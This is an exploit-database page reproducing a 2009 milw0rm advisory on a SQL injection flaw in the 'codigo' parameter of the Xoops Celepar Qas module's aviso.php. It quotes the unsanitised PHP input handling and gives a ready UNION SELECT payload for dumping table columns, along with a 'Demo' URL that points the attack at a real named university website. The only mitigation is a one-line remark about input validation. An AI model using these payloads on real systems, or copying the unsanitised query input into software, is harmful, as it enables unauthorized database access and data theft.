header-logo
Suggest Exploit
vendor:
Celepar Module Qas
by:
s4r4d0
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Celepar Module Qas
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Xoops Celepar Module Qas

A SQL Injection vulnerability has been found on modules Quas of Xoops Celepar in file Aviso.php. The vulnerable code is: $codigo = $_POST['codigo']; else $codigo = $_GET['codigo'];. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'codigo' in the URL. Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--

Mitigation:

Input validation should be used to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

**********************************************************************************************************
Xoops Celepar Module Qas
Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail:s4r4d0@yahoo.com
**********************************************************************************************************
A Sql Injection has been found on modules Quas of Xoops Celepar in file Aviso.php .
Source code:
    }
    $codigo = $_POST['codigo'];
} else
    $codigo = $_GET['codigo'];
***********************************************************************************************************
Target: site.com.br/modules/qas/aviso.php?codigo=
Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
***********************************************************************************************************
[ Fatal Error Group Br ]
[Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer  - M0nt3r - Vympel]
[From Brazil]
************************************************************************************************************

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR